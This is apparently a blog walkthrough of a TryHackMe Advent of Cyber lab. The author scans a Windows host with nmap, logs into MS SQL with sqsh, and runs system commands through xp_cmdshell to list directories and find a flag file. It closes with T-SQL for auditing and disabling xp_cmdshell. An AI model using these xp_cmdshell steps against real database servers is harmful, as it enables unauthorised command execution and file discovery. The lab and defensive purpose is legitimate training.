AoC3#11: Where Are The Reindeers
I’m now 46% of the way through the Advent of Cyber challenge, hosted by TryHackMe for December 2021. This writeup will cover Day 11, Where Are The Reindeers.
Previous writeups on my blog include Day 8 Santa’s Bag of Toys, Day 9 Where Is All This Data Going and Day 10 Offensive is the best Defence.
CTF – Where Are The Reindeers
This challenge sees me using sqsh, an interactive shell for MS-SQL databases.
We know that MS SQL Server is a Windows-based Relational Database Management System (RDBMS). As it’s hosted on a Microsoft Windows box, whose firewall drops ping probes by default, nmap’s host discovery is likely to report the host as down unless told otherwise.
└─$ nmap $IP -sT --top-ports=100
Starting Nmap 7.92 at 2021-12-18 06:13 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.11 seconds
As expected. I threw on the ‘assume the host is up’ argument (-Pn):
└─$ nmap $IP -sT --top-ports=100 -Pn
Starting Nmap 7.92 at 2021-12-18 06:14 EST
Nmap scan report for 10.10.164.145
Host is up (0.040s latency).
Not shown: 96 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
{port}/tcp open ms-sql-s
{port}/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 2.11 seconds
With the port number, I connected to MS SQL remotely using the sqsh shell.
It’s possible to then query the names and schedule tables from within the reindeer schema.
We’re then asked to get some remote code execution going on, using the xp_cmdshell command. I’d never used this before so that was interesting to see. As a test, I dropped a simple network command:
1> xp_cmdshell 'ipconfig /all'
2> go
output
Windows IP Configuration
Host Name . . . . . . . . . . . . : AOC2021-MSSQL
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : eu-west-1.ec2-
...
Link-local IPv6 Address . . . . . : fe80::a845:5408:...
IPv4 Address. . . . . . . . . . . : 10.10.164.145(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.0.1
DHCP Server . . . . . . . . . . . : 10.10.0.1
DHCPv6 IAID . . . . . . . . . . . : 118418632
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-...
DNS Servers . . . . . . . . . . . : 10.0.0.2
NetBIOS over Tcpip. . . . . . . . : Enabled
...
I’m sure that RCE will come in useful for future CTF events. So will this one:
2> xp_cmdshell path
3> go
...
PATH=C:\Windows\system32; C:\Windows; C:\Windows\System32\Wbem; C:\Windows\System32\WindowsPowerShell\v1.0\; C:\Windows\System32\OpenSSH\; C:\Program Files\Amazon\cfn-bootstrap\;C:\Program Files (x86)\Microsoft SQL Server
\150\DTS\Binn\; C:\Program Files\Azure Data Studio\bin; C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\; C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\; C:\Program Files\Microsoft SQL Server\150\Tools\Binn\; C:\Program Files\
Microsoft SQL Server\150\DTS\Binn\; C:\ProgramData\chocolatey\bin; C:\Windows\ServiceProfiles\MSSQLSERVER\AppData\Local\Microsoft\WindowsApps
By chaining two commands together, we browse to the grinch’s home directory and display its contents in one instruction. I do this because each xp_cmdshell call starts a fresh shell, so a cd in one call does not carry over to the next.
1> xp_cmdshell 'cd c:\users\grinch & dir'
2> go
output
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
NULL
Directory of c:\Users\grinch
NULL
11/10/2021 02:22 AM <DIR> .
11/10/2021 02:22 AM <DIR> ..
11/10/2021 02:22 AM <DIR> 3D Objects
11/10/2021 02:22 AM <DIR> Contacts
11/10/2021 02:22 AM <DIR> Desktop
11/10/2021 02:29 AM <DIR> Documents
11/10/2021 02:22 AM <DIR> Downloads
11/10/2021 02:22 AM <DIR> Favorites
11/10/2021 02:22 AM <DIR> Links
11/10/2021 02:22 AM <DIR> Music
11/10/2021 02:22 AM <DIR> Pictures
11/10/2021 02:22 AM <DIR> Saved Games
11/10/2021 02:22 AM <DIR> Searches
11/10/2021 02:22 AM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 5,452,894,208 bytes free
NULL
I then chained together a cd and a dir command to search for the flag automatically.
1> xp_cmdshell 'cd c:\users\grinch & dir "*flag*" /s /p'
2> go
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
...
Directory of c:\Users\grinch\Documents
11/10/2021 02:28 AM 21 flag.txt
1 File(s) 21 bytes
...
Probably shouldn’t have been surprised to find the file there, but the premise was still good. We can then use the type command to output the flag’s value.
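The flip side of this technique is what a defender should look at on an instance like this one. The following T-SQL is an added example written for this writeup, not part of the TryHackMe room or the sqsh project; it assumes sysadmin rights on the instance being reviewed and that the audit directory C:\SQLAudit\ exists.

```sql
-- Added example (not from the original writeup): review and lock down
-- xp_cmdshell on an SQL Server instance. Run from sqsh or SSMS as sysadmin.

-- 1. Is xp_cmdshell currently enabled? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'show advanced options');

-- 2. Who could call it? sysadmin members can run it directly; anyone else
--    needs an explicit EXECUTE grant on master.dbo.xp_cmdshell (plus a proxy
--    account), so list both groups.
SELECT sp.name, sp.type_desc
FROM   sys.server_principals sp
WHERE  IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND  sp.type IN ('S', 'U', 'G');     -- SQL logins, Windows users, Windows groups

SELECT dp.name AS grantee, p.permission_name, p.state_desc
FROM   master.sys.database_permissions p
JOIN   master.sys.database_principals dp
       ON dp.principal_id = p.grantee_principal_id
WHERE  p.major_id = OBJECT_ID('master.dbo.xp_cmdshell');

-- 3. Harden: switch xp_cmdshell off and hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Detect: record every EXECUTE of xp_cmdshell (by anyone) in a server audit,
--    so a re-enable followed by 'ipconfig' or 'dir' style calls leaves a trail.
USE master;
CREATE SERVER AUDIT xp_cmdshell_audit
    TO FILE (FILEPATH = 'C:\SQLAudit\');           -- assumed path
ALTER SERVER AUDIT xp_cmdshell_audit WITH (STATE = ON);

CREATE DATABASE AUDIT SPECIFICATION xp_cmdshell_calls
    FOR SERVER AUDIT xp_cmdshell_audit
    ADD (EXECUTE ON OBJECT::dbo.xp_cmdshell BY public)
    WITH (STATE = ON);

-- 5. Read the trail back: statement text, login and time of each call.
SELECT event_time, server_principal_name, statement
FROM   sys.fn_get_audit_file('C:\SQLAudit\*', DEFAULT, DEFAULT)
WHERE  object_name = 'xp_cmdshell'
ORDER  BY event_time DESC;
```

Step 1 alone is enough to spot the weak setting this room relies on; steps 3 and 4 are the fix and the evidence that it stays fixed.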
With that flag revealed, I completed Day 11 of Advent of Cyber.
Again, I found this challenge enjoyable as it exposed me to two new things, sqsh and xp_cmdshell.